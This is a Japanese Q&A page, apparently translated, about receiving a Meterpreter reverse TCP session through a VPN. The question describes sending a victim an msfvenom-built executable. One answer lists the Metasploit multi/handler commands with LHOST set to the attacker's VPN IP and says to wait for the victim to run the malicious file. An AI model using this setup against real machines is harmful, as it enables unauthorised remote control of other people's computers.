web-dev-qa-db-ja.com

VPN経由のMeterpreterセッション

次のような状況です。

ISPからパブリックIPが割り当てられ、転送が有効になっているルーターに接続された攻撃者のマシン。

別のルーターに接続された被害者のマシン、(明らかに)異なるISPから割り当てられた異なるIP。

リバースtcpを使用してmeterpreterセッションを確立したい。 msfvenomでペイロード実行ファイルを作成し、攻撃者のルーターのパブリックIPをLHOSTパラメータとして指定してから、攻撃者のマシンのローカルIPをLHOSTとして設定してリスナーを起動します。

ここまで問題ありません。

攻撃者のマシンを自作のVPNサーバーに接続して同じことを試みましたが、成功しませんでした。これは可能ですか?

もしそうなら、それを機能させるためにペイロードとリスナーの両方に設定する必要があるのはどのIPアドレスですか?

6
MKay

リバースシェルを使用している場合は、内部LAN IPではなく、攻撃者のVPN IPでLHOSTを設定する必要があります。また、LPORTで設定する必要のある特定のポートをMetasploitでローカルにリッスンする必要があり、msfvenom(es。443)と同じである必要があります。これを達成するために使用できます:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

次に、被害者が悪意のある実行可能ファイルを開くのを待ちます

3
Cricco95

はい、openvpnを使用している場合は可能です。 dmzを設定できます。 Openvpnにはそれを行う機能があります。 VPNパブリックIPは、dmzで構成されている場合、クライアントにポートを転送できます。 VPNのIPを設定し、内部クライアントのIPをLHOSTとして設定しないでください

0
Tim Jonas